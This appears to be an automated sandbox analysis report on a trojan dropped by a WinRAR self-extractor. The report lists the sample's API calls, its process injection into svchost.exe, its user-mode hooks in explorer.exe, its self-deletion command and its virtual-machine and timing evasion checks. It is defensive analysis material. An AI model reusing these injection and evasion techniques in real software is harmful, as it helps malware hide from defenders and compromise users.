Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00409E5B	2_2_00409E5B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00409E60	2_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00402FB0	2_2_00402FB0

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: String function: 00C7F5F0 appears 31 times
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: String function: 00C7EB78 appears 39 times
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: String function: 00C7EC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: String function: 0164B150 appears 32 times

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD043D GetTempFileNameW,NtSetInformationFile,NtWriteFile,CreateProcessInternalW,GetThreadContext,SetThreadContext,GetThreadContext,	1_2_00BD043D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD07DF NtOpenFile,	1_2_00BD07DF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689540 NtReadFile,LdrInitializeThunk,	2_2_01689540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01689910
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016895D0 NtClose,LdrInitializeThunk,	2_2_016895D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016899A0 NtCreateSection,LdrInitializeThunk,	2_2_016899A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01689860
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689840 NtDelayExecution,LdrInitializeThunk,	2_2_01689840
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016898F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_016898F0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689710 NtQueryInformationToken,LdrInitializeThunk,	2_2_01689710
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016897A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_016897A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689780 NtMapViewOfSection,LdrInitializeThunk,	2_2_01689780
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01689660
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A50 NtCreateFile,LdrInitializeThunk,	2_2_01689A50
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A20 NtResumeThread,LdrInitializeThunk,	2_2_01689A20
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01689A00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016896E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_016896E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689560 NtWriteFile,	2_2_01689560
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689950 NtQueueApcThread,	2_2_01689950
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689520 NtWaitForSingleObject,	2_2_01689520
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168AD30 NtSetContextThread,	2_2_0168AD30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016895F0 NtQueryInformationFile,	2_2_016895F0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016899D0 NtCreateProcessEx,	2_2_016899D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168B040 NtSuspendThread,	2_2_0168B040
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689820 NtEnumerateKey,	2_2_01689820
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016898A0 NtWriteVirtualMemory,	2_2_016898A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689760 NtOpenProcess,	2_2_01689760
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689770 NtSetInformationFile,	2_2_01689770
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168A770 NtOpenThread,	2_2_0168A770
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689730 NtQueryVirtualMemory,	2_2_01689730
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689B00 NtSetValueKey,	2_2_01689B00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168A710 NtOpenProcessToken,	2_2_0168A710
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689FE0 NtCreateMutant,	2_2_01689FE0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168A3B0 NtGetContextThread,	2_2_0168A3B0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689670 NtQueryInformationProcess,	2_2_01689670
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689650 NtQueryValueKey,	2_2_01689650
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689610 NtEnumerateValueKey,	2_2_01689610
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A10 NtQuerySection,	2_2_01689A10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016896D0 NtCreateKey,	2_2_016896D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A80 NtOpenDirectoryObject,	2_2_01689A80
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A360 NtCreateFile,	2_2_0041A360
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A410 NtReadFile,	2_2_0041A410
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A490 NtClose,	2_2_0041A490
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A540 NtAllocateVirtualMemory,	2_2_0041A540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A35A NtCreateFile,	2_2_0041A35A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A3B2 NtCreateFile,	2_2_0041A3B2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A40A NtReadFile,	2_2_0041A40A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A48B NtClose,	2_2_0041A48B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A53A NtAllocateVirtualMemory,	2_2_0041A53A

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C66FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00C66FAA

Source: F61A.tmp.1.dr

Static PE information: No import functions for PE file found

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: F61A.tmp.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: F61A.tmp.1.dr

Static PE information: Section .text

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File read: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Jump to behavior

Source: primosdv3.1.1.0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\primosdv3.1.1.0.exe C:\Users\user\Desktop\primosdv3.1.1.0.exe
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/4@2/2

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C66C74 GetLastError,FormatMessageW,

0_2_00C66C74

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_01

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00C7A6C2

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Command line argument: sfxname	0_2_00C7DF1E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Command line argument: sfxstime	0_2_00C7DF1E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Command line argument: STARTDLG	0_2_00C7DF1E

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: primosdv3.1.1.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: primosdv3.1.1.0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
Source:	Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp

Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7F640 push ecx; ret	0_2_00C7F653
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7EB78 push eax; ret	0_2_00C7EB96
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0169D0D1 push ecx; ret	2_2_0169D0E4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00417B13 push edi; retf	2_2_00417B14
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D4B5 push eax; ret	2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00417D68 push edx; ret	2_2_00417D6A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D56C push eax; ret	2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D502 push eax; ret	2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D50B push eax; ret	2_2_0041D572

Source: primosdv3.1.1.0.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109

Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.410591725114109

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	File created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	File created: C:\Users\user\AppData\Local\Temp\F61A.tmp			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE6

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\F61A.TMP

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D79904 second address: 0000000002D7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D79B7E second address: 0000000002D79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F61A.tmp

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 2_2_01686DE6 rdtsc

2_2_01686DE6

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

API coverage: 9.3 %

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7E6A3 VirtualQuery,GetSystemInfo,

0_2_00C7E6A3

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00C6A69B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00C7C220
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8B348 FindFirstFileExA,	0_2_00C8B348

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

API call chain: ExitProcess graph end node

graph_0-25066

Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000003.00000000.304900101.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.299904671.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.284751375.000000000F62F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft Sto

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00C7F838

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C8C030 GetProcessHeap,

0_2_00C8C030

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 2_2_01686DE6 rdtsc

2_2_01686DE6

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C87DEE mov eax, dword ptr fs:[00000030h]	0_2_00C87DEE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD007A mov eax, dword ptr fs:[00000030h]	1_2_00BD007A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0019 mov eax, dword ptr fs:[00000030h]	1_2_00BD0019
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0149 mov eax, dword ptr fs:[00000030h]	1_2_00BD0149
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0005 mov eax, dword ptr fs:[00000030h]	1_2_00BD0005
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C962 mov eax, dword ptr fs:[00000030h]	2_2_0164C962
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]	2_2_0166C577
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]	2_2_0166C577
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]	2_2_0164B171
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]	2_2_0164B171
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]	2_2_0166B944
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]	2_2_0166B944
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01683D43 mov eax, dword ptr fs:[00000030h]	2_2_01683D43
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C3540 mov eax, dword ptr fs:[00000030h]	2_2_016C3540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01667D50 mov eax, dword ptr fs:[00000030h]	2_2_01667D50
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718D34 mov eax, dword ptr fs:[00000030h]	2_2_01718D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov ecx, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
